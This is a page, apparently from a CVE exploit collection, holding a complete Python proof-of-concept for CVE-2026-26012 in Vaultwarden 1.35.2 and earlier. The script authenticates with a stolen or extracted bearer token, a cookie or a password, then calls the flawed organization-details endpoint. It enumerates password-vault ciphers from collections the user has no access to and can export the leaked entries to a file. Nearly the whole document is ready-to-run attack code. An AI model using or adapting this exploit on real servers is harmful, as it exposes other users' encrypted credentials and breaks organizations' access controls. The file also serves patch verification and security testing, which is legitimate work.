4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc_cve_2026_26012.py PY
#!/usr/bin/env python3
"""
CVE-2026-26012 - Vaultwarden Full Cipher Enumeration PoC
=========================================================
Affected: Vaultwarden <= 1.35.2
Fixed in: Vaultwarden 1.35.3
CVSS:     6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE:      CWE-863 (Incorrect Authorization)

Supports multiple authentication methods:
  - Bearer token (from SSO, 2FA, or manual extraction)
  - Session cookie
  - Direct password login (simple setups without SSO/2FA)

Usage examples:
  # With a Bearer token (recommended for SSO + 2FA setups)
  python3 poc_cve_2026_26012.py --url https://vw.example.com \
      --token "eyJhbGciOi..." --org-id <org-uuid>

  # With a session cookie
  python3 poc_cve_2026_26012.py --url https://vw.example.com \
      --cookie "VAULTWARDEN_SESSION=abc123..." --org-id <org-uuid>

  # With raw cookie header (multiple cookies)
  python3 poc_cve_2026_26012.py --url https://vw.example.com \
      --cookie-header "session=abc; token=xyz" --org-id <org-uuid>

  # Direct login (only works without SSO/2FA)
  python3 poc_cve_2026_26012.py --url https://vw.example.com \
      --email [email protected] --password "Password123" --org-id <org-uuid>

How to extract your token/cookie:
  1. Open your Vaultwarden web vault in a browser
  2. Log in normally (SSO + 2FA)
  3. Open DevTools (F12) -> Network tab
  4. Perform any action in the vault (e.g. click on a folder)
  5. Find an API request (e.g. /api/sync)
  6. Copy the "Authorization: Bearer <token>" header value
     OR copy the Cookie header value

Disclaimer:
  For authorized security testing and educational purposes only.
"""

import argparse
import json
import sys
import urllib.request
import urllib.error
import urllib.parse
import base64
import hashlib
import ssl


# ─────────────────────────────────────────────
# 1. HTTP Helper
# ─────────────────────────────────────────────

class VaultwardenClient:
    """HTTP client handling various auth methods for Vaultwarden API."""

    def __init__(self, base_url: str, verify_ssl: bool = True):
        self.base_url = base_url.rstrip("/")
        self.auth_header = None
        self.cookie_header = None

        if not verify_ssl:
            self.ssl_ctx = ssl.create_default_context()
            self.ssl_ctx.check_hostname = False
            self.ssl_ctx.verify_mode = ssl.CERT_NONE
        else:
            self.ssl_ctx = None

    # ── Auth configuration ──

    def set_bearer_token(self, token: str):
        """Use a Bearer token (JWT) for authentication."""
        token = token.strip()
        if token.lower().startswith("bearer "):
            token = token[7:]
        self.auth_header = f"Bearer {token}"

    def set_cookie(self, cookie: str):
        """Use a raw cookie string for authentication."""
        self.cookie_header = cookie.strip()

    def login_password(self, email: str, password: str):
        """
        Authenticate via password grant.
        NOTE: Only works for instances WITHOUT SSO and WITHOUT 2FA.
        For SSO/2FA setups, use --token or --cookie instead.
        """
        # Step 1: Get KDF parameters
        prelogin_data = self._post_json(
            "/api/accounts/prelogin",
            {"email": email},
        )
        kdf_type = prelogin_data.get("kdf", prelogin_data.get("Kdf", 0))
        kdf_iterations = prelogin_data.get("kdfIterations",
                            prelogin_data.get("KdfIterations", 600000))

        print(f"    KDF type: {kdf_type}, iterations: {kdf_iterations}")

        # Step 2: Derive master password hash (PBKDF2-SHA256)
        if kdf_type == 0:  # PBKDF2
            master_key = hashlib.pbkdf2_hmac(
                "sha256",
                password.encode("utf-8"),
                email.lower().encode("utf-8"),
                kdf_iterations,
                dklen=32,
            )
            master_password_hash = hashlib.pbkdf2_hmac(
                "sha256",
                master_key,
                password.encode("utf-8"),
                1,
                dklen=32,
            )
            b64_hash = base64.b64encode(master_password_hash).decode()
        else:
            print(f"[!] KDF type {kdf_type} (Argon2id) not supported in this PoC.")
            print("    Please authenticate via browser and use --token instead.")
            sys.exit(1)

        # Step 3: Request token
        payload = urllib.parse.urlencode({
            "grant_type": "password",
            "username": email,
            "password": b64_hash,
            "scope": "api offline_access",
            "client_id": "web",
            "deviceType": "9",
            "deviceIdentifier": "poc-cve-2026-26012",
            "deviceName": "PoC Script",
        })

        try:
            token_data = self._post_form("/identity/connect/token", payload)
            self.auth_header = f"Bearer {token_data['access_token']}"
            return token_data
        except Exception as e:
            error_msg = str(e)
            if "TwoFactor" in error_msg or "two_factor" in error_msg.lower():
                print("[!] 2FA is required. Cannot proceed with password login.")
                print("    Please authenticate via browser and use --token instead.")
                print("    See --help for instructions on extracting your token.")
            elif "sso" in error_msg.lower() or "redirect" in error_msg.lower():
                print("[!] SSO redirect detected. Cannot proceed with password login.")
                print("    Please authenticate via browser and use --token instead.")
            else:
                print(f"[!] Login failed: {error_msg}")
            sys.exit(1)

    # ── HTTP methods ──

    def _build_request(self, path: str, method: str = "GET",
                       data: bytes = None, content_type: str = None) -> urllib.request.Request:
        url = f"{self.base_url}{path}"
        req = urllib.request.Request(url, data=data, method=method)
        req.add_header("Accept", "application/json")
        req.add_header("User-Agent", "Mozilla/5.0 (PoC CVE-2026-26012)")

        if content_type:
            req.add_header("Content-Type", content_type)
        if self.auth_header:
            req.add_header("Authorization", self.auth_header)
        if self.cookie_header:
            req.add_header("Cookie", self.cookie_header)

        return req

    def _do_request(self, req: urllib.request.Request) -> dict:
        try:
            kwargs = {"context": self.ssl_ctx} if self.ssl_ctx else {}
            with urllib.request.urlopen(req, **kwargs) as resp:
                body = resp.read()
                content_type = resp.headers.get("Content-Type", "")
                status = resp.status

                if not body or len(body.strip()) == 0:
                    # Empty body — return status info so callers can handle it
                    return {"_status": status, "_empty": True}

                decoded = body.decode("utf-8", errors="replace").strip()

                # Check if response is actually JSON
                if decoded.startswith(("<", "<!DOCTYPE")):
                    # Got HTML back (likely a redirect/login page)
                    raise RuntimeError(
                        f"HTTP {status}: Server returned HTML instead of JSON. "
                        f"Your token/cookie may be invalid or expired, "
                        f"or the server is redirecting to a login page."
                    )

                try:
                    return json.loads(decoded)
                except json.JSONDecodeError:
                    # Non-JSON, non-HTML response
                    raise RuntimeError(
                        f"HTTP {status}: Unexpected response format "
                        f"(Content-Type: {content_type}): {decoded[:200]}"
                    )
        except urllib.error.HTTPError as e:
            body = e.read().decode(errors="replace")
            raise RuntimeError(f"HTTP {e.code}: {body}")

    def _post_json(self, path: str, obj: dict) -> dict:
        data = json.dumps(obj).encode()
        req = self._build_request(path, "POST", data, "application/json")
        return self._do_request(req)

    def _post_form(self, path: str, form_data: str) -> dict:
        req = self._build_request(
            path, "POST", form_data.encode(), "application/x-www-form-urlencoded"
        )
        return self._do_request(req)

    def get(self, path: str) -> dict:
        req = self._build_request(path)
        return self._do_request(req)


# ─────────────────────────────────────────────
# 2. Exploit functions
# ─────────────────────────────────────────────

def verify_auth(client: VaultwardenClient) -> dict:
    """
    Verify authentication by trying several endpoints.
    Different auth methods (token vs cookie) may respond differently.
    """
    # Try endpoints in order of reliability
    endpoints = [
        "/api/accounts/profile",
        "/api/sync?excludeDomains=true",
        "/api/accounts/revision-date",
    ]

    last_error = None
    for endpoint in endpoints:
        try:
            data = client.get(endpoint)

            # Handle empty response (token may work but endpoint returns nothing)
            if isinstance(data, dict) and data.get("_empty"):
                last_error = f"Empty response from {endpoint}"
                continue

            # /api/sync wraps profile in "profile" key
            if "profile" in data or "Profile" in data:
                return data.get("profile", data.get("Profile", data))

            # /api/accounts/profile returns profile directly
            if "email" in data or "Email" in data or "id" in data or "Id" in data:
                return data

            # /api/accounts/revision-date returns a date string — auth works
            # but we don't have profile info
            if isinstance(data, dict) and not data.get("_empty"):
                return {"email": "(verified via revision-date)", "name": "(authenticated)"}

            last_error = f"Unexpected response format from {endpoint}"
            continue

        except RuntimeError as e:
            error_str = str(e)
            if "401" in error_str:
                print("[!] Authentication failed (401 Unauthorized).")
                print("    Your token/cookie may be expired or invalid.")
                print("    Please re-authenticate and try again.")
                sys.exit(1)
            elif "403" in error_str:
                print("[!] Authentication failed (403 Forbidden).")
                sys.exit(1)
            elif "HTML instead of JSON" in error_str:
                print(f"[!] Server returned HTML for {endpoint}.")
                print("    Your token/cookie is likely invalid or expired.")
                print("    Please re-authenticate and try again.")
                sys.exit(1)
            else:
                last_error = error_str
                continue

    # If all endpoints returned empty but no hard error, auth might still work
    # (some setups return empty for profile but the token is valid)
    print(f"[~] Warning: Could not verify profile ({last_error})")
    print("    Proceeding anyway — if requests fail, your auth may be invalid.")
    return {"email": "(unverified)", "name": "(unverified)"}


def get_user_collections(client: VaultwardenClient, org_id: str) -> list:
    """Retrieve the collections the authenticated user has access to."""
    try:
        data = client.get(f"/api/organizations/{org_id}/collections")
        if isinstance(data, dict) and data.get("_empty"):
            print(f"[!] Empty response fetching collections — org-id may be wrong")
            return []
        return data.get("data", data.get("Data", []))
    except RuntimeError as e:
        print(f"[!] Could not fetch collections: {e}")
        return []


def exploit_org_details(client: VaultwardenClient, org_id: str) -> list:
    """
    Call the vulnerable endpoint:
      GET /api/ciphers/organization-details?organizationId=<org_id>

    Vulnerable behaviour (<= 1.35.2): returns ALL ciphers in the org
    regardless of collection-level access control.
    """
    try:
        data = client.get(
            f"/api/ciphers/organization-details?organizationId={org_id}"
        )
        if isinstance(data, dict) and data.get("_empty"):
            print("[!] Empty response from organization-details endpoint.")
            return []
        ciphers = data.get("data", data.get("Data", data))
        return ciphers if isinstance(ciphers, list) else []
    except RuntimeError as e:
        if "403" in str(e) or "401" in str(e):
            print(f"[!] Access denied to organization-details endpoint.")
            print("    You may not be a member of this organization,")
            print("    or the server is patched (>= 1.35.3).")
        else:
            print(f"[!] Exploit request failed: {e}")
        sys.exit(1)


def get_user_accessible_ciphers(client: VaultwardenClient, org_id: str) -> list:
    """
    Fetch ciphers via the normal /api/sync endpoint to compare what the
    user is *supposed* to see vs what the vulnerable endpoint returns.
    """
    try:
        data = client.get("/api/sync?excludeDomains=true")
        if isinstance(data, dict) and data.get("_empty"):
            return []
        all_ciphers = data.get("ciphers", data.get("Ciphers", []))
        org_ciphers = [
            c for c in all_ciphers
            if c.get("organizationId", c.get("OrganizationId")) == org_id
        ]
        return org_ciphers
    except RuntimeError:
        return []


# ─────────────────────────────────────────────
# 3. Analysis & Reporting
# ─────────────────────────────────────────────

def analyze_results(vuln_ciphers: list, legit_ciphers: list,
                    accessible_collection_ids: set):
    """
    Compare ciphers from the vulnerable endpoint vs. legitimate access.
    Two complementary detection methods:
      1. By collection: ciphers in collections the user cannot access
      2. By sync diff: ciphers not present in the normal /api/sync response
    """
    legit_cipher_ids = {c.get("id", c.get("Id")) for c in legit_ciphers}
    leaked = []
    legitimate = []

    for cipher in vuln_ciphers:
        cipher_id = cipher.get("id", cipher.get("Id"))
        cipher_collections = set(
            cipher.get("collectionIds", cipher.get("CollectionIds", []))
        )

        in_restricted_collection = (
            cipher_collections
            and not cipher_collections.intersection(accessible_collection_ids)
        )
        not_in_sync = cipher_id not in legit_cipher_ids

        if in_restricted_collection or not_in_sync:
            cipher["_leak_reason"] = []
            if in_restricted_collection:
                cipher["_leak_reason"].append("restricted_collection")
            if not_in_sync:
                cipher["_leak_reason"].append("absent_from_sync")
            leaked.append(cipher)
        else:
            legitimate.append(cipher)

    return legitimate, leaked


def print_cipher_summary(cipher: dict, index: int):
    """Print a human-readable summary of a cipher."""
    cipher_id = cipher.get("id", cipher.get("Id", "N/A"))
    cipher_type = cipher.get("type", cipher.get("Type", "?"))
    type_names = {1: "Login", 2: "SecureNote", 3: "Card", 4: "Identity"}
    type_str = type_names.get(cipher_type, f"Unknown({cipher_type})")

    name = str(cipher.get("name", cipher.get("Name", "N/A")))
    collections = cipher.get("collectionIds", cipher.get("CollectionIds", []))
    leak_reason = cipher.get("_leak_reason", [])
    revision = cipher.get("revisionDate", cipher.get("RevisionDate", "N/A"))

    login_data = cipher.get("login") or cipher.get("Login") or {}
    uris = login_data.get("uris") or login_data.get("Uris") or []
    has_password = bool(login_data.get("password") or login_data.get("Password"))
    has_totp = bool(login_data.get("totp") or login_data.get("Totp"))
    attachments = cipher.get("attachments") or cipher.get("Attachments") or []

    print(f"  [{index}]")
    print(f"    ID:            {cipher_id}")
    print(f"    Type:          {type_str}")
    print(f"    Name (enc):    {name[:70]}{'...' if len(name) > 70 else ''}")
    print(f"    Collections:   {collections}")
    print(f"    Revision:      {revision}")
    print(f"    Leak reason:   {', '.join(leak_reason)}")
    if cipher_type == 1:
        print(f"    Has password:  {'Yes' if has_password else 'No'}")
        print(f"    Has TOTP:      {'Yes' if has_totp else 'No'}")
        print(f"    URIs count:    {len(uris)}")
    if attachments:
        print(f"    Attachments:   {len(attachments)}")
    print(f"    ---")


# ─────────────────────────────────────────────
# 4. Main
# ─────────────────────────────────────────────

def main():
    banner = r"""
   ╔══════════════════════════════════════════════════════════╗
   ║       CVE-2026-26012 — Vaultwarden PoC                  ║
   ║  Full Cipher Enumeration via /organization-details       ║
   ║  Affected: <= 1.35.2 | Fixed: 1.35.3                    ║
   ╚══════════════════════════════════════════════════════════╝
    """
    print(banner)

    parser = argparse.ArgumentParser(
        description="CVE-2026-26012 - Vaultwarden Cipher Enumeration PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Authentication methods (use ONE):
  --token TOKEN       Bearer/JWT token (recommended for SSO + 2FA)
  --cookie COOKIE     Session cookie value
  --cookie-header HDR Raw Cookie header (multiple cookies)
  --email + --password  Direct login (no SSO, no 2FA only)

How to extract your Bearer token:
  1. Log into Vaultwarden web vault (complete SSO + 2FA)
  2. Open browser DevTools (F12) -> Network tab
  3. Click any item in the vault to trigger an API call
  4. Find a request to /api/... and copy the Authorization header
     Example: "Bearer eyJhbGciOiJSUzI1NiIs..."
  5. Pass the token value (with or without "Bearer " prefix)

How to extract your session cookie:
  1. Log into Vaultwarden web vault
  2. Open DevTools (F12) -> Application -> Cookies
  3. Copy the relevant cookie(s)
  OR: In Network tab, copy the full Cookie header from any request
        """,
    )

    parser.add_argument("--url", required=True,
                        help="Vaultwarden base URL (e.g. https://vw.example.com)")
    parser.add_argument("--org-id", required=True,
                        help="Target organization UUID")

    auth = parser.add_argument_group("Authentication (choose one)")
    auth.add_argument("--token",
                      help="Bearer/JWT token (from browser DevTools)")
    auth.add_argument("--cookie",
                      help="Session cookie value (name=value)")
    auth.add_argument("--cookie-header",
                      help="Raw Cookie header string (multiple cookies)")
    auth.add_argument("--email",
                      help="Email (for direct password login, no SSO/2FA)")
    auth.add_argument("--password",
                      help="Master password (for direct password login)")

    parser.add_argument("--output", default=None,
                        help="Save full JSON results to file")
    parser.add_argument("--no-verify-ssl", action="store_true",
                        help="Skip SSL certificate verification")
    parser.add_argument("--show-all", action="store_true",
                        help="Show all ciphers, not just leaked ones")
    parser.add_argument("--max-display", type=int, default=20,
                        help="Max leaked ciphers to display (default: 20)")

    args = parser.parse_args()

    # ── Validate auth ──
    has_token = bool(args.token)
    has_cookie = bool(args.cookie or args.cookie_header)
    has_password = bool(args.email and args.password)
    auth_methods = sum([has_token, has_cookie, has_password])

    if auth_methods == 0:
        parser.error(
            "No authentication provided. Use --token, --cookie, "
            "--cookie-header, or --email + --password.\n"
            "For SSO + 2FA setups, use --token (see --help)."
        )
    if auth_methods > 1:
        parser.error("Please use only one authentication method.")

    # ── Init client ──
    client = VaultwardenClient(args.url, verify_ssl=not args.no_verify_ssl)

    # ── Configure auth ──
    if has_token:
        print("[*] Authentication method: Bearer token")
        client.set_bearer_token(args.token)
    elif args.cookie_header:
        print("[*] Authentication method: Cookie header")
        client.set_cookie(args.cookie_header)
    elif args.cookie:
        print("[*] Authentication method: Session cookie")
        client.set_cookie(args.cookie)
    elif has_password:
        print(f"[*] Authentication method: Password login as {args.email}")
        print("    (Note: won't work with SSO or 2FA enabled)")
        client.login_password(args.email, args.password)

    # ── Step 1: Verify auth ──
    print("[*] Verifying authentication...")
    profile = verify_auth(client)
    user_email = profile.get("email", profile.get("Email", "unknown"))
    user_name = profile.get("name", profile.get("Name", "unknown"))
    print(f"[+] Authenticated as: {user_name} ({user_email})")

    # ── Step 2: Get legitimate collections ──
    org_id = args.org_id
    print(f"\n[*] Fetching accessible collections for org {org_id[:8]}...")
    collections = get_user_collections(client, org_id)
    accessible_ids = {c.get("id", c.get("Id")) for c in collections}
    print(f"[+] User has access to {len(accessible_ids)} collection(s)")
    for c in collections:
        coll_name = c.get("name", c.get("Name", c.get("id", "?")))
        coll_id = c.get("id", c.get("Id", "?"))
        print(f"    - {coll_name} ({coll_id[:8]}...)")

    # ── Step 3: Get legitimate ciphers via /api/sync ──
    print(f"\n[*] Fetching legitimate ciphers via /api/sync...")
    legit_ciphers = get_user_accessible_ciphers(client, org_id)
    print(f"[+] User can legitimately see {len(legit_ciphers)} cipher(s) in this org")

    # ── Step 4: Exploit ──
    print(f"\n[*] Calling vulnerable endpoint /api/ciphers/organization-details...")
    vuln_ciphers = exploit_org_details(client, org_id)
    total = len(vuln_ciphers)
    print(f"[+] Vulnerable endpoint returned {total} cipher(s)")

    if total == 0:
        print("[!] No ciphers returned. The org may be empty or the endpoint is restricted.")
        sys.exit(0)

    # ── Step 5: Analyze ──
    legitimate, leaked = analyze_results(vuln_ciphers, legit_ciphers, accessible_ids)

    print(f"\n{'='*60}")
    print(f"  RESULTS")
    print(f"{'='*60}")
    print(f"  Ciphers via /sync (legitimate):        {len(legit_ciphers)}")
    print(f"  Ciphers via /organization-details:      {total}")
    print(f"  Difference (leaked):                    {len(leaked)}")
    print(f"{'='*60}")

    if leaked:
        print(f"\n  [!!] VULNERABLE — {len(leaked)} cipher(s) leaked\n")
        display_count = min(len(leaked), args.max_display)
        for i, cipher in enumerate(leaked[:display_count], 1):
            print_cipher_summary(cipher, i)
        if len(leaked) > display_count:
            print(f"\n  ... and {len(leaked) - display_count} more."
                  f" Use --output to export all.")
    else:
        print(f"\n  [OK] NOT VULNERABLE (or user has access to all collections)")
        print(f"       Both endpoints returned the same ciphers.")
        print(f"       The server may be patched (>= 1.35.3).")

    if args.show_all and legitimate:
        print(f"\n  --- Legitimately accessible ciphers ({len(legitimate)}) ---\n")
        for i, cipher in enumerate(legitimate, 1):
            print_cipher_summary(cipher, i)

    # ── Step 6: Export ──
    if args.output:
        for c in leaked:
            c.pop("_leak_reason", None)
        output_data = {
            "vulnerability": "CVE-2026-26012",
            "target": args.url,
            "organization_id": org_id,
            "authenticated_as": user_email,
            "accessible_collections": len(accessible_ids),
            "ciphers_via_sync": len(legit_ciphers),
            "ciphers_via_vuln_endpoint": total,
            "leaked_count": len(leaked),
            "is_vulnerable": len(leaked) > 0,
            "leaked_cipher_ids": [c.get("id", c.get("Id")) for c in leaked],
            "leaked_ciphers": leaked,
        }
        with open(args.output, "w") as f:
            json.dump(output_data, f, indent=2, ensure_ascii=False)
        print(f"\n[+] Full results saved to {args.output}")

    print("\n[*] Done.")
    return 1 if leaked else 0


if __name__ == "__main__":
    sys.exit(main())